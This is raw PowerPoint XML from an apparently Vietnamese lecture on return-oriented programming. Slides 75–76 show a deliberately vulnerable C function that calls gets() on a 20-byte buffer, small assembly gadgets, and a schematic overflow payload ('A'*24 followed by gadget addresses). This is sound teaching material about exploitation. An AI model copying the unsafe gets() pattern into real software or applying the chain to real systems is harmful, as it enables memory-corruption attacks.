            <p:cNvPr id="10" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16468D2-8B56-7279-2582-3AC31B287B39}"/>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11" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50AFA898-644A-24B2-9AFE-8260808B769C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10"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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30242777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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F6A6A8-18B6-6E09-ACAD-9708BAEFF6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643106527"/>
              </p:ext>
            </p:extLst>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>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kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of &lt;foo+10&gt;]</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kumimoji="0" lang="en" sz="14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rPr>
                        <a:t>[address of &lt;bar+25&gt;]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx2">
                            <a:lumMod val="75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b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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13" name="Google Shape;625;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7EF729-B3C4-C528-B9B6-BD03D1FD606A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1219200"/>
            <a:ext cx="2778950" cy="1231076"/>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2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Khai thác:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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38761D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'A' * 24</a:t>
            </a:r>
            <a:b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br>
            <a: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2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rPr>
              <a:t>[address of &lt;bar+25&gt;]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="12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t>    + </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[address of &lt;foo+10&gt;]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="7030A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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    + ... (more chains)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="12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14" name="Google Shape;626;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5831716D-1000-8051-095E-11CB69DD80E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022476" y="1075800"/>
            <a:ext cx="1998648" cy="443195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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</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A64D79"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="7030A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bar:</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and $1, %edx</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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mov $1, %eax</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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vulnerable:</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r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:b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mov %ebp,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pop %ebp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main:</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call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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;629;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B581F3A3-18E5-857C-6A41-CAB872EC5BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217200" y="2954875"/>
            <a:ext cx="2256950" cy="2031295"/>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100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void vulnerable(void)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char name[20];</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gets(name);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int main(void)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return 0;</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFAF1B3-C6BD-4B1C-5621-8783C40CC8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648200" y="2743200"/>
            <a:ext cx="1248002" cy="1295400"/>
            <a:chOff x="5029200" y="2971800"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272ADBE8-2E0B-AC85-FF01-9CF54F53430C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5580447" y="4038600"/>
              <a:ext cx="315755"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34D068-4E0E-BE1D-5100-A735955F841D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5580447" y="2971800"/>
              <a:ext cx="0" cy="10668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21D4BB-FD18-ED62-6F4E-68C200DDCC82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5029200" y="2971800"/>
              <a:ext cx="551247" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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6A4FA52-D86B-2445-0C6D-89E5ACDCB65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4876802" y="1600206"/>
            <a:ext cx="1013922" cy="2117214"/>
            <a:chOff x="5011353" y="2621280"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9E8FB-4355-547A-85B7-3B239C580555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5562600" y="3688080"/>
              <a:ext cx="315755"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19C227-B7FC-5FD5-1490-34FD65052199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5562600" y="2621280"/>
              <a:ext cx="0" cy="106680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5E703C-9865-0E40-C885-E744E2E42DB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5011353" y="2621280"/>
              <a:ext cx="551247" cy="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D67939B-1257-0D48-E20F-FA6FA45257A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2474150" y="3657600"/>
            <a:ext cx="762000" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D264A98-0C75-EC08-54BE-5F7BC15E2EA9}"/>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32" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D133360A-6363-310F-1FE5-EB1635E68DF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3" name="Group 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302CFF30-3822-F9CD-A011-79000BF35BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5116077" y="6039168"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4C8F0C-39CB-5A86-E555-5CF17289378E}"/>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35" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4618802-246D-4E2D-5A8D-4A5C04A12553}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="34"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994766D4-45D6-FBE1-C477-376107B7C0E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE70F655-E18B-E362-3F02-E72A65CA2013}"/>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38" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE49C42-51A6-05B0-4FF6-C38F849633EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="37"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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6087CD8D-CAC0-8B09-574E-9C0937A42F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591550" y="4189532"/>
            <a:ext cx="552450" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1"/>
              <a:t>SFP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935365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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F6A6A8-18B6-6E09-ACAD-9708BAEFF6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>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kumimoji="0" lang="en" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="7030A0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>[address of &lt;foo+10&gt;]</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kumimoji="0" lang="en" sz="14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rPr>
                        <a:t>[address of &lt;bar+25&gt;]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx2">
                            <a:lumMod val="75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b="1">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'AAAA'</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14" name="Google Shape;626;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5831716D-1000-8051-095E-11CB69DD80E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022476" y="1075800"/>
            <a:ext cx="1998648" cy="443195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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</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A64D79"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="7030A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bar:</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and $1, %edx</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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mov $1, %eax</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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vulnerable:</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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:b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mov %ebp,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r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pop %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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main:</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call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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;629;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B581F3A3-18E5-857C-6A41-CAB872EC5BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217200" y="2954875"/>
            <a:ext cx="2256950" cy="2031295"/>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100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void vulnerable(void)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char name[20];</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gets(name);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int main(void)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return 0;</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFAF1B3-C6BD-4B1C-5621-8783C40CC8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4648200" y="2743200"/>
            <a:ext cx="1248002" cy="1295400"/>
            <a:chOff x="5029200" y="2971800"/>
            <a:chExt cx="867002" cy="1066800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
